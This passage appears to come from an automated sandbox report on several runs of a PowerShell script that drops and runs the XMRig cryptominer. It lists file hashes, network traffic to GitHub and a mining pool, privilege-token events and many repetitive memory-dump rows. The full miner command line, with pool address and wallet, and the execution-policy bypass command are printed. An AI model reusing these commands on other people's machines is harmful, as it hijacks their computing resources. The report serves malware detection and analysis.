US 8.8.8.8:53 21.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp

Files

memory/2912-0-0x00007FFD4F1B3000-0x00007FFD4F1B5000-memory.dmp

memory/2912-1-0x000001C5D4E20000-0x000001C5D4E42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fnhvxse4.2bi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2912-11-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/2912-12-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/2912-14-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/2912-15-0x000001C5D5BE0000-0x000001C5D5BF2000-memory.dmp

memory/2912-16-0x000001C5D59B0000-0x000001C5D59BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3900-47-0x000002536CCD0000-0x000002536CCF0000-memory.dmp

memory/3900-48-0x000002536CE20000-0x000002536CE40000-memory.dmp

memory/3900-49-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/2912-51-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/2912-50-0x00007FFD4F1B3000-0x00007FFD4F1B5000-memory.dmp

memory/3900-52-0x000002536CE40000-0x000002536CE60000-memory.dmp

memory/3900-53-0x000002536CE60000-0x000002536CE80000-memory.dmp

memory/3900-54-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/2912-55-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/3900-56-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-58-0x000002536CE40000-0x000002536CE60000-memory.dmp

memory/3900-57-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-59-0x000002536CE60000-0x000002536CE80000-memory.dmp

memory/3900-60-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-61-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-62-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-63-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-64-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-65-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-66-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-67-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-68-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-69-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-70-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-71-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-72-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-73-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-74-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-75-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-76-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-77-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-78-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-79-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-80-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-81-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-82-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-83-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-84-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-85-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-86-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-87-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-88-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-89-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-90-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-91-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-92-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-93-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-94-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-95-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-96-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-97-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-98-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-99-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-100-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-101-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-102-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-103-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-104-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-105-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-106-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-107-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-108-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-109-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-110-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-111-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-112-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-113-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-114-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-115-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-116-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-117-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

memory/3900-118-0x00007FF6F45D0000-0x00007FF6F5203000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:38

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 194.98.74.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/4748-3-0x00007FFBB4133000-0x00007FFBB4134000-memory.dmp

memory/4748-5-0x0000027BD0F20000-0x0000027BD0F42000-memory.dmp

memory/4748-8-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

memory/4748-9-0x0000027BD1140000-0x0000027BD11B6000-memory.dmp

memory/4748-10-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_blmdw4r0.n3i.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4748-26-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

memory/4748-62-0x0000027BD0F90000-0x0000027BD0F9A000-memory.dmp

memory/4748-49-0x0000027BD0FB0000-0x0000027BD0FC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1360-91-0x0000029814980000-0x00000298149A0000-memory.dmp

memory/1360-92-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/4748-93-0x00007FFBB4133000-0x00007FFBB4134000-memory.dmp

memory/4748-95-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

memory/1360-94-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/4748-96-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

memory/1360-97-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-98-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-99-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-100-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-101-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-102-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-103-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-104-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-105-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-106-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-107-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-108-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-109-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-110-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-111-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-112-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-113-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-114-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-115-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-116-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-117-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-118-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-119-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-120-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-121-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-122-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-123-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-124-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-125-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-126-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-127-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-128-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-129-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-130-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-131-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-132-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-133-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-134-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-135-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-136-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-137-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-138-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-139-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-140-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-141-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-142-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-143-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-144-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-145-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-146-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-147-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-148-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-149-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-150-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-151-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-152-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-153-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-154-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-155-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-156-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

memory/1360-157-0x00007FF60EF40000-0x00007FF60FB73000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:05

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1749s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp

Files

memory/1192-0-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0phwvvn1.ft3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1192-1-0x00000203455C0000-0x00000203455E2000-memory.dmp

memory/1192-11-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/1192-12-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/1192-14-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/1192-15-0x00000203463A0000-0x00000203463B2000-memory.dmp

memory/1192-16-0x00000203455F0000-0x00000203455FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1472-47-0x00000176EDCB0000-0x00000176EDCD0000-memory.dmp

memory/1472-48-0x00000176EDCF0000-0x00000176EDD10000-memory.dmp

memory/1472-49-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1192-50-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

memory/1472-51-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-54-0x00000176EDD30000-0x00000176EDD50000-memory.dmp

memory/1192-52-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/1472-53-0x00000176EDD10000-0x00000176EDD30000-memory.dmp

memory/1192-55-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/1472-56-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-57-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-58-0x00000176EDD10000-0x00000176EDD30000-memory.dmp

memory/1472-59-0x00000176EDD30000-0x00000176EDD50000-memory.dmp

memory/1472-60-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-61-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-62-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-63-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-64-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-65-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-66-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-67-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-68-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-69-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-70-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-71-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-72-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-73-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-74-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-75-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-76-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-77-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-78-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-79-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-80-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-81-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-82-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-83-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-84-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-85-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-86-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-87-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-88-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-89-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-90-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-91-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-92-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-93-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-94-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-95-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-96-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-97-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-98-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

